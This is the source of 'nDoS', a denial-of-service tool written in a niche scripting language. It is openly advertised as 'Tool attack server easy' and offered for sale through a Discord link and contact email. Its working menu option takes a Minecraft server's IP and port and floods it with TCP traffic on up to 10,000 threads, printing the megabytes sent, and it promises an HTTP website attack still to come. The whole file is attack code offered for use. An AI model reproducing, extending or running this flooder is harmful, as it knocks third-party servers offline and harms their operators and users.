# ============================================================================
# nDoS — Manios
# ============================================================================
# Author:  IdlerHa
# Version: 2.0.0
#
# Tich hop: nSocks TCP Library + nDoS Attack Tool
# ============================================================================

# ===================== LOAD NATIVE PLUGIN =====================
load_ext("/root/.manios/nplugin/nsocks.so")

# ===================== CẤU HÌNH =====================
hold PACKET_PER_CONN = 4
hold DATA_PER_PACKET = 2097152

# ===================== NSOCKS LOADED VIA load_ext ABOVE =====================

# ============================================================================
# nDoS — Attack Functions
# ============================================================================

# ===== Logo =====
craft logo
    yell ""
    yell "  ▄▄▄▄▄▄      ▄▄                  ▄▄     ▄▄▄   ▄   ▄▄▄▄       ▄▄▄▄▄"
    yell "  Tool attack server easy."
    yell "  Author: IdlerHa"
    yell ""
end

# ===== Tấn công Minecraft (dùng tcp_flood built-in, pure Manios) =====
craft attack_minecraft
    hold data = input("Input IP:PORT Server: ")
    hold colon_pos = find(data, ":")
    check colon_pos == -1
        yell "Invalid format! Use IP:PORT (e.g. 1.2.3.4:25565)"
        yell ""
        give none
    end
    hold ip = substr(data, 0, colon_pos)
    hold port_str = substr(data, colon_pos + 1, len(data) - colon_pos - 1)
    check port_str == ""
        yell "Defaulting to port 25565"
        hold port = 25565
    end
    check port_str != ""
        hold port = int(port_str)
    end
    hold thread_input = input("Thread count (ex:500): ")
    hold thread_count = 500
    check thread_input != ""
        set thread_count = int(thread_input)
    end
    check thread_count > 10000
        set thread_count = 10000
        yell "[!] Max thread count is 10000. Capped to 10000."
    end
    check thread_count < 1
        set thread_count = 1
    end

    yell ""
    yell "[+] Attacking " + ip + ":" + str(port) + " with " + str(thread_count) + " threads..."
    yell "[+] Press Ctrl+C to stop"
    yell ""
    tcp_flood_reset_stats()
    tcp_flood(ip, port, thread_count, DATA_PER_PACKET, PACKET_PER_CONN)
    hold prev = 0
    spin while true
        sleep(1)
        hold now = tcp_flood_stats()
        hold delta = now - prev
        set prev = now
        hold mb = float(delta) / 1048576.0
        hold mbps = (float(delta) * 8.0) / 1048576.0
        yell "[+] Sent " + str(mb) + " MB (" + str(mbps) + " Mbps) to " + ip + ":" + str(port)
    end
end

# ===== Giới thiệu =====
craft show_intro
    yell "=============================================================="
    yell ""
    yell "         [1] - Author: IdlerHa"
    yell "         [2] - Discord: @banhmius"
    yell "         [3] - Buy tool: https://discord.gg/un6bs3aCrF"
    yell "         [4] - Contact: minhchienmmo@outlook.com"
    yell ""
    yell "=============================================================="
    yell ""
    hold _ = input("Press any key to return...")
end

# ===== Menu chính =====
craft menu
    hold running = true
    spin while running
        yell "============================================================"
        yell "         [1] - Attack Minecraft Server (TCP)"
        yell "         [2] - Attack Website Server (HTTP) [Coming Soon]"
        yell "         [3] - Introduction"
        yell "         [4] - Exit"
        yell "============================================================"
        yell ""
        hold choice = input("Your choice: ")
        check choice == "1"
            attack_minecraft()
        end
        check choice == "2"
            yell "=============================================================="
            yell ""
            yell "           This feature is not yet completed."
            yell ""
            yell "=============================================================="
            yell ""
            hold _ = input("Press any key to return...")
        end
        check choice == "3"
            show_intro()
        end
        check choice == "4"
            yell "Thank you for using my program!"
            set running = false
        end
        check choice == ""
            yell ""
        end
    end
end

logo()
menu()
exit(0)
